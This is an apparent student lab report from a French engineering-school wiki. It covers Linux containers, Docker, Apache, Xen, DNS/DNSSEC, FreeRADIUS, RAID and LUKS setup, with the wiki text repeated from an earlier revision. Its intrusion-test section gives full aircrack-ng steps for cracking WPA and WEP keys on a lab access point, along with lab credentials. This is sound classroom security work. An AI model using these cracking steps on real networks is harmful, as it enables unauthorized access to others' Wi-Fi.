ip link set vif2 master mehcret2<br />
ip link set vif3 master mehcret2<br />
ip link set vif4 master bridge<br />
<br />
*'''Activation des interfaces''':<br />
ip link set eth0 up<br />
ip link set eth1 up<br />
<br />
*'''Récupération du PID des conteneurs :'''<br />
ps auxwww | grep unshare<br />
<br />
*'''Ajout des interfaces dans les conteneurs :'''<br />
ip link set eth0@vif2 netns /proc/19382/ns/net name eth0 (dsk1)<br />
ip link set eth0@vif1 netns /proc/19377/ns/net name eth0 (dsk2)<br />
ip link set eth1@vif4 netns /proc/19377/ns/net name eth1 (dsk2)<br />
ip link set eth0@vif3 netns /proc/19396/ns/net name eth0 (dsk3)<br />
<br />
*'''Activation du pont:''' <br />
ip address add dev mehcret2 192.168.60.0/24<br />
<br />
*'''Attribution des adresses:'''<br />
ip address add dev eth0 192.168.60.51/24 (dsk1)<br />
ip address add dev eth0 192.168.60.52/24 (dsk2)<br />
ip address add dev eth0 192.168.60.53/24 (dsk3)<br />
ip address add dev eth1 172.26.145.67/24 (dsk2)<br />
ip route add default via 172.26.145.254 (dsk2)<br />
<br />
*'''Activation :'''<br />
ip link set eth0 up<br />
ip link set vif1 up<br />
ip link set vif2 up<br />
ip link set vif3 up<br />
ip link set vif4 up<br />
ip link set mehcret2 up<br />
<br />
On peut désormais pinger entre les différents conteneurs.<br />
<br />
===Configuration des serveurs Web===<br />
<br />
Nous devons maintenant mettre en place les serveurs apache.<br />
<br />
Dans un premier temps, on créé les sous-domaines dont nous avons besoin. Dans les enregistrements DNS du domaine '''plil.space''', on ajoute les enregistrements suivants : <br />
<br />
- mndtMehcret A 172.26.145.67 (mndtMehcret sera le serveur mandataire. On le fait pointer sur l'adresse eth1 du conteneur 2)<br />
<br />
- web1Mehcret CNAME mndtMehcret (Serveur web du conteneur 1)<br />
<br />
- web2Mehcret CNAME mndtMhecret (Serveur web du conteneur 3)<br />
<br />
On configure ensuite les serveurs Apache. On attribue au premier serveur sur le conteneur 1 la configuration suivante dans le répertoire /etc/apache2/sites-available/ :<br />
<br />
<VirtualHost *:80><br />
ServerName web1mehcret.plil.space<br />
Options Indexes FollowSymLinks<br />
DocumentRoot /var/www/html/web1mehcret/<br />
</VirtualHost> <br />
<br />
On fait de même dans le conteneur 3 pour le serveur 2 en mettant les ServerName et Document root associés.<br />
On écrit ensuite une page HTML basique dans les dossiers /var/www/html/web1mehcret/ et /var/www/html/web2mehcret/ afin de reconnaître notre serveur web. <br />
<br />
Il faut maintenant mettre en place le reverse proxy. <br />
Dans le conteneur 2, connectée à la fois à eth0 et eth1, nous mettons en place la configuration suivante :<br />
<br />
<VirtualHost *:80><br />
ServerName mndtMehcret.plil.space<br />
ProxyPass "/web1" "http://192.168.60.51/"<br />
ProxyPassReverse "/web1" "http://192.168.60.51/"<br />
ProxyPass "/web2" "http://"http://192.168.60.53/"<br />
ProxyPassReverse "/web2" "http://192.168.60.53/"<br />
</VirtualHost><br />
<br />
Les lignes ProxyPass et ProxyPassReverse permettent alors la redirection sur les serveurs web du conteneur 1 et 3.<br />
<br />
Après avoir configuré les différents serveurs Apache, il faut redémarrer les services sur chaque conteneur :<br />
<br />
$ service apache2 restart<br />
<br />
Pour utiliser apache en mode reverse proxy, on execute la commande :<br />
<br />
$ a2enmod proxy proxy_http<br />
<br />
11h25 : Serveurs Web unshare OK<br />
<br />
==Conteneurs Docker==<br />
<br />
Avant de lancer un conteneur, il faut modifier le fichier /etc/default/docker et commenter la ligne contenant iptables.<br />
Nous exécutons ensuite la commande :<br />
$ iptables-save<br />
Puis on redémarre le service Docker :<br />
$ service docker restart<br />
<br />
Sans les commandes réalisées précédemment, nous n'avions pas accès au réseau dans les conteneurs.<br />
<br />
Nous pouvons maintenant lancer un conteneur basé sur l'image officielle de debian :<br />
$ docker run -i -t debian<br />
<br />
Dans le conteneur, nous ajoutons le proxy de l'école :<br />
$ export http_proxy=http://proxy.polytech-lille.fr:3128/ <br />
<br />
Nous pouvons maintenant utiliser le gestionnaire de paquets apt afin d'installer apache2 et un éditeur de texte:<br />
$ apt-get update<br />
$ apt-get install apache2, nano, vim<br />
<br />
On sauvegarde ensuite le conteneur pour pouvoir le lancer plus tard en 3 exemplaires : <br />
<br />
$ docker commit [IDduConteneur] mehcret<br />
<br />
On créé un réseau Docker pour isoler nos conteneurs ensemble :<br />
<br />
$ docker network create --driver bridge mehcretnetwork<br />
<br />
Nous lançons ensuite 3 conteneurs sur le réseau précédemment créé en liant le port 80 du conteneur 3 (qui jouera le rôle de reverse proxy) au port 80 de la machine : <br />
<br />
$ docker run -i --network mehcretnetwork --name mehcret1 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret2 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret3 -p 80:80 mehcret<br />
<br />
Nous créons un nouveau sous domaine, dockerMehcret.plil.space pointant sur l'adresse IP de notre bridge en ajoutant un enregistrement de type A.<br />
Finalement, on configure les différents serveurs Apache comme nous l'avions fait dans la partie précédente.<br />
<br />
<br />
10h30 Serveurs Web (docker) OK<br />
<br />
<br />
=TP PRA=<br />
<br />
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous aurons à installer une machine virtuelle Xen ainsi qu’à implanter un auto-commutateur téléphonique logiciel. Enfin la mise en place d’un réseau Wifi sécurisé et d’un site web sécurisé nous permettra de mettre en pratiques nos connaissances en la matière.<br />
<br />
==Tâche 5 : Câblage, connexion SR52, cordouan==<br />
<br />
===Connexion des routeurs au réseau de l'école===<br />
<br />
*'''Connexion SR52 - Routeur ISR4221 (E306)'''<br />
<br />
Dans le local SR52, on branche un câble du port 21 du routeur jusqu'au port K-16 du commutateur qui est relié à la prise murale qui se situe au dessus de cordouan en E306.<br />
<br />
Sur le routeur, on passe le port 21 sur le vlan 131 : <br />
<br />
config t<br />
int gi1/0/21<br />
switchport access vlan 131<br />
write<br />
<br />
En E306, on relie le port Gigabit 0/0/0 du routeur ISR4221 à la prise murale SR52.3-K16.<br />
<br />
Les LEDs passent alors au vert et on observe que le port 21 du routeur en SR52 est bien connecté :<br />
<br />
<br />
<gallery mode="nolines" widths=500px heights=400px><br />
<br />
File:TableVlansInterfacesSR52.jpg<br />
<br />
File:LedSR52.jpg<br />
<br />
<br />
</gallery><br />
<br />
*'''Connexion SR52 - Routeur Catalyst 3560 (E304)'''<br />
<br />
En E304, on remarque une fibre libre de code couleur Blanc-Noir, on retrouve cette même fibre connectée au routeur en SR52 sur une interface 10Gb et déjà configurée sur le bon Vlan. On branche alors cette fibre sur la première interface 10 Gb du routeur Catalyst 3560 en E304 en accord avec le groupe configurant ce routeur. Le routeur de la E304 est désormais connecté au réseau de l'école.<br />
<br />
<br />
===Connexion des commutateurs aux routeurs===<br />
<br />
*'''Connexion Routeur Catalyst 3560 - Commutateur 4006 (E304)'''<br />
<br />
Le routeur utilisé en E304 permettant la communication 10Gb, on relie le commutateur au routeur par 10 câbles afin de profiter au maximum des possibilités offertes par le Catalyst 3560. Le groupe s'occupant des commutateurs ayant configuré le commutateur de la E304 pour communiquer avec le routeur de cette même salle par les ports 4 à 13, on branche 10 câbles ethernet sur ces ports que l'on relie au routeur sur les ports 1 à 10.<br />
<br />
*'''Connexion Routeur ISR 4221 - Commutateur 6000 (E306)'''<br />
<br />
Contrairement au routeur utilisé en E304, le routeur en E306 ne permet une communication que Gb. Le commutateur sera donc relié au routeur par un seul câble. En accord avec le groupe configurant le routeur et celui configurant le commutateur, on relie ces derniers par un câble ethernet du port Gigabit 0/0/2 du routeur au port 14 du commutateur.<br />
<br />
*'''Connexion Routeur ISR 4221 (E306) - Commutateur 4006 (E304) '''<br />
<br />
La connexion entre le routeur et le commutateur doit se faire par fibre étant donné que ces deux appareils se trouvent dans deux salles différentes. On utilise pour cela la fibre disponible de code couleur (A COMPLETER). Du côté de la salle E306, on connecte la fibre à l'interface Gb 0/0/1. En E304, on connecte la fibre sur un port UPLINK du commutateur.<br />
<br />
*'''Connexion Commutateur 6000 (E306) - Routeur Catalyst 3560 (E304) '''<br />
<br />
La connexion au niveau du routeur ne pouvant se faire ici que par cuivre, nous devons utiliser un convertisseur fibre - cuivre. Pour interconnecter le commutateur 6000 au routeur Catalyst 3560, nous utilisons la fibre disponible de code couleur ORANGE. On connecte alors cette fibre sur le port (A COMPLETER) du commutateur de la E306. De l'autre côté, en E304, on connecte la fibre à un convertisseur puis le convertisseur au port 11 du routeur par un câble ethernet en accord avec le groupe configurant ce routeur.<br />
<br />
===Connexions au serveur Cordouan===<br />
<br />
Finalement, il faut connecter le serveur Cordouan à notre réseau afin d'avoir du réseau sur nos futures VM. <br />
<br />
*'''Connexion Commutateur 6000 (E306) - Serveur Cordouan '''<br />
<br />
Le commutateur 6000 se trouvant dans la même salle que le serveur Cordouan, on peut relier ces derniers par cuivre. On relie alors le port 17 au serveur Cordouan par câble ethernet.<br />
<br />
*'''Connexion Routeur Catalyst 3560 (E306) - Serveur Cordouan '''<br />
<br />
Ces deux appareils se trouvant dans deux salles différentes, la connexion ne peut se faire que par fibre. Cependant, nous ne disposons plus de convertisseur. Nous avons donc relié le serveur Cordouan au routeur de la E306 plutôt qu'au commutateur. Nous avons pour cela utilisé la fibre de code couleur BLEU. Nous connectons d'un côté la fibre au deuxième port Gigabit du routeur 3560, et de l'autre, la fibre au serveur Cordouan.<br />
<br />
===Connexion des commutateurs aux points d'accès===<br />
<br />
===Schéma résumant le câblage réalisé :===<br />
<br />
[[Fichier:ArchitectureMehCret.png|1500px]]<br />
<br />
== 2.Installation des systèmes d'exploitation==<br />
<br />
===Création de la machine virtuelle===<br />
<br />
Création d'une machine virtuelle sur cordouan.insecserv.deule.net :<br />
<br />
xen-create-image --hostname=hercule --ip=193.48.57.183 --netmask=255.255.255.224 --gateway=193.48.57.160 --dir=/usr/local/xen<br />
<br />
Il fois la machine créée, on ajoute le bridge dans la config hercule.cfg<br />
<br />
vif = ['ip=193.48.57.183 , mac=#####, bridge=StudentsInfo']<br />
xen create hercule.cfg<br />
<br />
On vérifie que la machine est bien créée en s'y connectant :<br />
<br />
xl console hercule<br />
<br />
Création des partitions logiques sur Cordouan pour la machine virtuelle :<br />
lvcreate -L 10G -n /dev/virtual/hercule-home -v<br />
lvcreate -L 10G -n /dev/virtual/hercule-var -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes : <br />
'phy:/dev/virtual/hercule-home,xvdb1,w',<br />
'phy:/dev/virtual/hercule-var,xvdb2,w'<br />
<br />
On relance la VM.<br />
On formate les disques créés sur la machine :<br />
mkfs -t ext4 /dev/xvdb1<br />
mkfs -t ext4 /dev/xvdb2<br />
<br />
Afin de lier le home de notre vm au disque créé précédemment, on modifie le fichier /etc/fstab en y ajoutant la ligne suivante :<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
Puis on effectue le montage :<br />
mount -a <br />
<br />
Pour le var, il faut monter temporairement le disque pour ne pas occulter le repertoire : <br />
mount /dev/xvdb2 /mnt<br />
<br />
On déplace ensuite le contenu de var dans le point de montage précédemment créé :<br />
mv /var/* /mnt<br />
<br />
Finalement, on ajoute dans le fichier /etc/fstab la ligne suivante pour effectuer le montage permanent :<br />
/dev/xvdb2 /var ext4 defaults 0 2<br />
<br />
On applique les modifications :<br />
mount -a<br />
<br />
==4.Services internet==<br />
<br />
<br />
===Serveur DNS===<br />
<br />
Achat du domaine hercule.pw sur gandi.<br />
<br />
Installation de bind9: <br />
<br />
apt install bind9 bind9-host dnsutils<br />
<br />
Modification de la configuration de bind9 :<br />
On créé un fichier de configuration de zone db.hercule.space dans /etc/bind/ avec le contenu suivant : <br />
<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns.hercule.space. root.hercule.space (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
IN NS ns.hercule.space.<br />
IN NS ns6.gandi.net<br />
@ IN A 193.48.57.183<br />
ns IN A 193.48.57.183<br />
www IN A 193.48.57.183<br />
<br />
Ajout de notre zone DNS en modifiant le fichier /etc/bind/named.conf.local :<br />
<br />
zone "hercule.space" {<br />
type master;<br />
file "/etc/bind/db.hercule.space"; <br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
La ligne 'allow-transfer' précise les adresses des serveurs esclaves Gandi.<br />
<br />
Redémarrage du serveur bind9 :<br />
service bind9 restart<br />
<br />
Ajout de glue records sur Gandi pour permettre l'association du serveur DNS créé avec notre adresse IP : <br />
name : ns.hercule.space<br />
IP address : 193.48.57.183<br />
<br />
Changement du nameserver principal sur Gandi (A FAIRE): <br />
DNS 1 : ns.hercule.space<br />
<br />
On laisse ceux de Gandi pour les deux serveurs esclaves<br />
<br />
ZONES INVERSES A FAIRE<br />
<br />
===DNSSEC===<br />
<br />
Dans un premier temps, on active DNSSEC en ajoutant dans le fichier /etc/bind/named la ligne :<br />
dnssec-enable yes;<br />
<br />
Création d'un répertoire de nom hercule.space.dnssec pour y générer les clefs<br />
<br />
Création de la clef asymétrique de signature de clefs de zone :<br />
<br />
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE hercule.space<br />
:<br />
Création de la clef asymétrique de la zone pour signer les enregistrements :<br />
<br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE hercule.space<br />
<br />
On renomme ces clef : <br />
hercule.space-ksk.key<br />
hercule.space-zsk.key<br />
<br />
Puis on les inclus dans le fichier /etc/bind/db.hercule.space<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-ksk.key<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-zsk.key<br />
<br />
On signe les enregistrements de la zone :<br />
dnssec-signzone -o hercule.space -k hercule.space-ksk ../db.hercule.space hercule.space-zsk<br />
<br />
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe .signed :<br />
file "/etc/bind/db.hercule.space.signed";<br />
<br />
On communique les parties publiques de la KSK et ZSK à Gandi dans l'onglet DNSSEC. On n'oublie pas également d'incrémenter le SERIAL dans le fichier db.hercule.space.<br />
<br />
===Serveur Apache===<br />
<br />
<br />
Création du dossier /var/www/www.hercule.pw<br />
<br />
*''' Certification SSL :'''<br />
<br />
Génération du Certificate Signing Request (CSR) pour Gandi sur la VM :<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout hercule.pw.key -out hercule.pw.csr<br />
<br />
On copie le contenu de la clé générée sur Gandi. Pour valider la certification SSL, on choisi la méthode par DNS Record. On ajoute alors l'enregistrement CNAME proposé par Gandi dans notre configuration de zone sur la VM. Il faut maintenant patienter le temps du traitement. <br />
<br />
*'''Configuration Apache :'''<br />
<br />
Configuration du serveur web dans le fichier /etc/apache2/sites-available/hercule.space.conf<br />
<br />
<VirtualHost 193.48.57.183:443><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_acces.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/www.hercule.space.crt<br />
SSLCertificateKeyFile /etc/ssl/private/hercule.space.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
<VirtualHost 193.48.57.183:80><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
Redirect / https://www.hercule.space<br />
</VirtualHost><br />
<br />
<br />
Modification du fichier ports.conf pour que le serveur web écoute sur le port 443 :<br />
<br />
Listen 80 443<br />
<br />
On active enfin le module SSL, notre site, et on redémarre le service apache :<br />
a2enmod ssl<br />
a2ensite hercule.space.conf<br />
service apache2 restart<br />
<br />
===Serveur Freeradius===<br />
<br />
Installation de Freeradius sur la vm :<br />
apt-get install freeradius<br />
<br />
On ajoute ensuite un utilisateur au serveur freeradius. Pour cela, dans le fichier /etc/freeradius/3.0/users on ajoute : <br />
hercule Cleartext-Password := "glopglop"<br />
<br />
Il nous est demandé de configurer le serveur en PEAP-MSCHAPv2. Pour cela, on modifie les fichiers : <br />
<br />
- /etc/freeradius/3.0/mods-enabled/eap :<br />
default_eap_type = peap<br />
<br />
- /etc/freeradius/3.0/mods-enabled/mschap :<br />
use_mppe = yes<br />
require_encryption = yes<br />
require_strong = yes<br />
with_ntdomain_hack = yes<br />
<br />
<br />
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :<br />
client 192.168.0.10/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
client 192.168.0.11/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
<br />
On met à jour la configuration : <br />
ldconfig<br />
<br />
== 5. Tests d'intrusion ==<br />
===Crackage de clé WPA===<br />
<br />
Afin de lancer le crackage de clé WPA sur le point d'accès cracotte07, nous avons besoin du package aircrack-ng que nous installons. Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi pour la mettre en mode moniteur:<br />
<br />
$ airmon-ng start wlp2s0<br />
<br />
Nous affichons ensuite tout les point d'accés environnants en utilisant la commande :<br />
<br />
$ airodump-ng wlp2s0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng -c 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlp2s0mon<br />
<br />
Une fois les fichiers générés, nous les transférons sur une ZABETH. Avant de lancer le craquage, nous devons générer un dictionnaire contenant toutes les combinaisons possibles de 8 chiffres. Pour cela, nous réalisons le script bash suivant :<br />
<br />
#!/bin/bash<br />
charset=({0..9})<br />
permute(){<br />
(($1 == 0)) && { echo "$2"; return; }<br />
for char in "${charset[@]}"<br />
do<br />
permute "$((${1} - 1 ))" "$2$char"<br />
done<br />
}<br />
permute "$1"<br />
<br />
Que nous laçons en exécutant :<br />
<br />
$ ./comb.sh 8 >> dictionnaire.txt<br />
<br />
Le crack est effectué en lançant la commande :<br />
<br />
$ aircrack-ng -a2 -b 04:DA:D2:9C:50:56 -w /path_to_file/dictionnaire.txt /path_to_file/*.cap<br />
<br />
Nous récupérons la clé après quelques heures de calcul :<br />
<br />
[[Fichier:Crack groupe7.png|600px]]<br />
<br />
===Cassage de clé WEP===<br />
<br />
<br />
Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi pour la mettre en mode moniteur:<br />
<br />
$ airmon-ng start wlx40a5ef012c92<br />
<br />
Nous affichons ensuite tout les point d'accés environnants protégés en WEP en utilisant la commande :<br />
<br />
$ airodump-ng --encrypt wep wlan0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng --channel 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlan0mon<br />
<br />
En parallèle, on simule une connexion au point d'accès pour récupérer le handshake : <br />
$ aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
On réalise le cassage : <br />
$ aircrack-ng ./path_to_folder/cracotte07.cap<br />
<br />
== 6. Réalisation ==<br />
<br />
===6.1 Sécurisation de données===<br />
<br />
Création de trois partitions LVM de 1Go sur Cordouan : <br />
lvcreate -L 1G -n /dev/virtual/hercule1 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule2 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule3 -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes :<br />
<br />
'phy:/dev/virtual/hercule1,xvdc1,w',<br />
'phy:/dev/virtual/hercule2,xvdc2,w',<br />
'phy:/dev/virtual/hercule3,xvdc3,w'<br />
<br />
<br />
Installation du paquetage mdadm pour réaliser le RAID5 logiciel :<br />
apt-get install mdadm<br />
<br />
Création du RAID5 :<br />
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdc1 /dev/xvdc2 /dev/xvdc3<br />
<br />
On formate le RAID créé : <br />
mkfs -t ext4 /dev/md0<br />
<br />
On monte le RAID dans notre VM : <br />
mount /dev/md0 /mnt <br />
<br />
On créé un fichier sur le RAID pour qu'il contienne des données. On ferme la VM et on lui retire la partition xvdc3 dans sa config.<br />
On relance la VM. Puis on essaye de remonter le RAID : <br />
En voulant remonter /dev/md0, un message nous indique que md0 n'existe pas. On lance alors la commande : <br />
cat /proc/mdstat<br />
Et on s'aperçoit que notre RAID est toujours présent, cette fois n'ayant plus que deux disques, mais apparaît sous le nom md127. On monte alors ce derrnier : <br />
mount /dev/md127 /mnt<br />
On retrouve alors bien le fichier créé initialement sur notre RAID. Lors de sa création, le fichier a été copié sur les 3 disques par le RAID. Ainsi, lorsque que nous avons supprimé un disque, cela n'a pas eu d'impact sur nos données.<br />
<br />
[[Fichier:Raidhercule.png|600px]]<br />
<br />
===6.1 Cryptage de données===<br />
<br />
Dans notre cas, nous n'utilisons pas une carte SD. Nous créons cependant une partition de 1 Giga sur cordouan sur laquelle on travaillera :<br />
<br />
$ lvcreate -L 1G -n /dev/virtual/hercule-crypt -v<br />
<br />
Une fois cette action réalisée, et la partition intégrée au fichier de configuration de la machine virtuelle sous forme de volume, de nom xvdd1, nous récupérons les paquets lvm2 et cryptsetup.<br />
Lorsque la récupération est terminée, nous sécurisons la partition de la manière suivante :<br />
<br />
$ cryptsetup luksFormat -c aes -h sha256 /dev/xvdd1<br />
<br />
Cette commande permet de formater la partiton au type LUKS et chiffre en AES avec un algorithme de hashage SHA256. Nous choisissons une phrase de chiffrement.<br />
<br />
Une fois la partition chiffrée, nous ouvrons un volume dans notre partition chiffrée :<br />
<br />
$ cryptsetup luksOpen /dev/xvdd1 home<br />
<br />
Nous la formatons en ext4 :<br />
<br />
$ mkfs -t ext4 /dev/mapper/home<br />
<br />
Enfin, nous montons la partition sous /mnt :<br />
<br />
$ mount -t ext4 /dev/mapper/home /mnt<br />
<br />
Nous y créeons ensuite un fichier texte.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G7&diff=48869TP sysres IMA5sc 2018/2019 G72018-12-17T16:06:19Z<p>Mcreteur : /* 5. Tests d'intrusion */</p>
<hr />
<div>= Wiki de TP =<br />
<br />
=TP GIS=<br />
<br />
==Conteneurs "à la main"==<br />
<br />
===Mise en place des conteneurs===<br />
<br />
*'''Création d'une partition''':<br />
dd if=/dev/zero of=/disk1 bs=1024K count=10240<br />
<br />
*'''Formatage''' : <br />
mtfs.etx4 /disk1<br />
<br />
*'''Montage de la partition''':<br />
mount /disk1 /mnt<br />
<br />
*'''Installation d'un système Debian''':<br />
debootstrap --include=apache2,nano stable /mnt <br />
<br />
*'''Préparation du montage du pseudo système de fichier /proc''':<br />
echo "proc /proc proc defaults 0 0" >> rootfs/etc/fstab<br />
<br />
*''' Démontage ''':<br />
umount /mnt<br />
<br />
*'''Copie en 2 exemplaires''':<br />
cp /disk1 /disk2<br />
cp /disk1 /disk3<br />
<br />
*'''Montage des 3 partitions :'''<br />
mount -oloop /disk1 /mnt/dsk1<br />
mount -oloop /disk2 /mnt/dsk2<br />
mount -oloop /disk3 /mnt/dsk3<br />
<br />
*'''Création du processus isolé par unshare''':<br />
unshare -p -f -m -n -u chroot /mnt/dsk1 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk2 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk3 /bin/sh -c "mount /proc ; /bin/bash"<br />
<br />
===Configuration réseau===<br />
*'''Création d'un commutateur logiciel''':<br />
ip link add mehcret2 type bridge<br />
<br />
*'''Création des interfaces virtuelles:'''<br />
ip link add vif1 type veth peer name eth0@vif1<br />
ip link add vif2 type veth peer name eth0@vif2<br />
ip link add vif3 type veth peer name eth0@vif3<br />
ip link add vif4 type veth peer name eth1@vif4<br />
<br />
*'''Ajout d'interfaces dans le commutateur :'''<br />
ip link set vif1 master mehcret2<br />
ip link set vif2 master mehcret2<br />
ip link set vif3 master mehcret2<br />
ip link set vif4 master bridge<br />
<br />
*'''Activation des interfaces''':<br />
ip link set eth0 up<br />
ip link set eth1 up<br />
<br />
*'''Récupération du PID des conteneurs :'''<br />
ps auxwww | grep unshare<br />
<br />
*'''Ajout des interfaces dans les conteneurs :'''<br />
ip link set eth0@vif2 netns /proc/19382/ns/net name eth0 (dsk1)<br />
ip link set eth0@vif1 netns /proc/19377/ns/net name eth0 (dsk2)<br />
ip link set eth1@vif4 netns /proc/19377/ns/net name eth1 (dsk2)<br />
ip link set eth0@vif3 netns /proc/19396/ns/net name eth0 (dsk3)<br />
<br />
*'''Activation du pont:''' <br />
ip address add dev mehcret2 192.168.60.0/24<br />
<br />
*'''Attribution des adresses:'''<br />
ip address add dev eth0 192.168.60.51/24 (dsk1)<br />
ip address add dev eth0 192.168.60.52/24 (dsk2)<br />
ip address add dev eth0 192.168.60.53/24 (dsk3)<br />
ip address add dev eth1 172.26.145.67/24 (dsk2)<br />
ip route add default via 172.26.145.254 (dsk2)<br />
<br />
*'''Activation :'''<br />
ip link set eth0 up<br />
ip link set vif1 up<br />
ip link set vif2 up<br />
ip link set vif3 up<br />
ip link set vif4 up<br />
ip link set mehcret2 up<br />
<br />
On peut désormais pinger entre les différents conteneurs.<br />
<br />
===Configuration des serveurs Web===<br />
<br />
Nous devons maintenant mettre en place les serveurs apache.<br />
<br />
Dans un premier temps, on créé les sous-domaines dont nous avons besoin. Dans les enregistrements DNS du domaine '''plil.space''', on ajoute les enregistrements suivants : <br />
<br />
- mndtMehcret A 172.26.145.67 (mndtMehcret sera le serveur mandataire. On le fait pointer sur l'adresse eth1 du conteneur 2)<br />
<br />
- web1Mehcret CNAME mndtMehcret (Serveur web du conteneur 1)<br />
<br />
- web2Mehcret CNAME mndtMhecret (Serveur web du conteneur 3)<br />
<br />
On configure ensuite les serveurs Apache. On attribue au premier serveur sur le conteneur 1 la configuration suivante dans le répertoire /etc/apache2/sites-available/ :<br />
<br />
<VirtualHost *:80><br />
ServerName web1mehcret.plil.space<br />
Options Indexes FollowSymLinks<br />
DocumentRoot /var/www/html/web1mehcret/<br />
</VirtualHost> <br />
<br />
On fait de même dans le conteneur 3 pour le serveur 2 en mettant les ServerName et Document root associés.<br />
On écrit ensuite une page HTML basique dans les dossiers /var/www/html/web1mehcret/ et /var/www/html/web2mehcret/ afin de reconnaître notre serveur web. <br />
<br />
Il faut maintenant mettre en place le reverse proxy. <br />
Dans le conteneur 2, connectée à la fois à eth0 et eth1, nous mettons en place la configuration suivante :<br />
<br />
<VirtualHost *:80><br />
ServerName mndtMehcret.plil.space<br />
ProxyPass "/web1" "http://192.168.60.51/"<br />
ProxyPassReverse "/web1" "http://192.168.60.51/"<br />
ProxyPass "/web2" "http://"http://192.168.60.53/"<br />
ProxyPassReverse "/web2" "http://192.168.60.53/"<br />
</VirtualHost><br />
<br />
Les lignes ProxyPass et ProxyPassReverse permettent alors la redirection sur les serveurs web du conteneur 1 et 3.<br />
<br />
Après avoir configuré les différents serveurs Apache, il faut redémarrer les services sur chaque conteneur :<br />
<br />
$ service apache2 restart<br />
<br />
Pour utiliser apache en mode reverse proxy, on execute la commande :<br />
<br />
$ a2enmod proxy proxy_http<br />
<br />
11h25 : Serveurs Web unshare OK<br />
<br />
==Conteneurs Docker==<br />
<br />
Avant de lancer un conteneur, il faut modifier le fichier /etc/default/docker et commenter la ligne contenant iptables.<br />
Nous exécutons ensuite la commande :<br />
$ iptables-save<br />
Puis on redémarre le service Docker :<br />
$ service docker restart<br />
<br />
Sans les commandes réalisées précédemment, nous n'avions pas accès au réseau dans les conteneurs.<br />
<br />
Nous pouvons maintenant lancer un conteneur basé sur l'image officielle de debian :<br />
$ docker run -i -t debian<br />
<br />
Dans le conteneur, nous ajoutons le proxy de l'école :<br />
$ export http_proxy=http://proxy.polytech-lille.fr:3128/ <br />
<br />
Nous pouvons maintenant utiliser le gestionnaire de paquets apt afin d'installer apache2 et un éditeur de texte:<br />
$ apt-get update<br />
$ apt-get install apache2, nano, vim<br />
<br />
On sauvegarde ensuite le conteneur pour pouvoir le lancer plus tard en 3 exemplaires : <br />
<br />
$ docker commit [IDduConteneur] mehcret<br />
<br />
On créé un réseau Docker pour isoler nos conteneurs ensemble :<br />
<br />
$ docker network create --driver bridge mehcretnetwork<br />
<br />
Nous lançons ensuite 3 conteneurs sur le réseau précédemment créé en liant le port 80 du conteneur 3 (qui jouera le rôle de reverse proxy) au port 80 de la machine : <br />
<br />
$ docker run -i --network mehcretnetwork --name mehcret1 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret2 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret3 -p 80:80 mehcret<br />
<br />
Nous créons un nouveau sous domaine, dockerMehcret.plil.space pointant sur l'adresse IP de notre bridge en ajoutant un enregistrement de type A.<br />
Finalement, on configure les différents serveurs Apache comme nous l'avions fait dans la partie précédente.<br />
<br />
<br />
10h30 Serveurs Web (docker) OK<br />
<br />
<br />
=TP PRA=<br />
<br />
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous aurons à installer une machine virtuelle Xen ainsi qu’à implanter un auto-commutateur téléphonique logiciel. Enfin la mise en place d’un réseau Wifi sécurisé et d’un site web sécurisé nous permettra de mettre en pratiques nos connaissances en la matière.<br />
